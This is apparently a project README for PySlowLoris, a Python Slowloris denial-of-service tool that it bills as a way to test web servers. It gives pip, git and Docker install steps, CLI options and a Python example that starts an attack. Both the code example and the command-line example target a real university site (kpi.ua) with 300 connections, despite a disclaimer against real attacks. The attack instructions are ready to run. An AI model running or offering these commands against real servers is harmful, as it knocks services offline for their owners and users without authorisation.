This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I'm trying doing here, please join my team and let's do fun together. Please DO NOT use this in the real attacks on the servers.

The main reason why I'm writing this module it is to create the easy tool for the fast check a small personal or corporate web server what based on Apache and etc. Also, last but not least reason is to improve my skills in this sphere.

More information you can find here.

To install PySlowLoris, run this command in your terminal:

$ pip install pyslowloris

This is the preferred method to install PySlowLoris, as it will always install the most recent stable release.

In case you downloaded or cloned the source code from GitHub or your own fork, you can run the following to install cameo for development:

$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ virtualenv --python=python[version] venv
$ source venv/bin/active
$ pip install --editable .

Pulling image from Docker Hub and run container:

$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]

Also you can build image from Dockerfile and run container:

$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]

Note: Don't forget about 'sudo'!

Available command list:

$ slowloris --help
usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT]

Small and simple tool for testing Slow Loris vulnerability

optional arguments:
  -h                show this help message and exit
  -u URL            link to the web server (http://google.com) - str
  -s SOCKET_COUNT   maximum count of created connection (default value 300) - int
  -p PORT           port what will be used - int

Here are some example to start attack from Python code

import time
from PySlowLoris import TargetInfo, SlowLorisAttack

target = TargetInfo(url="http://kpi.ua/", port=80)
target.get_info()
slowloris = SlowLorisAttack(target)
slowloris.start_attack() # stop_attack()

while True:
    time.sleep(1)

The following command helps to use module from command line

$ slowloris -u http://kpi.ua/ -s 300

If you find bugs or have suggestions about improving the module, don't hesitate to contact me.

This project is licensed under the MIT License - see the LICENSE file for details

Copyright (c) 2017 Maxim Krivich

maxkrivich.github.io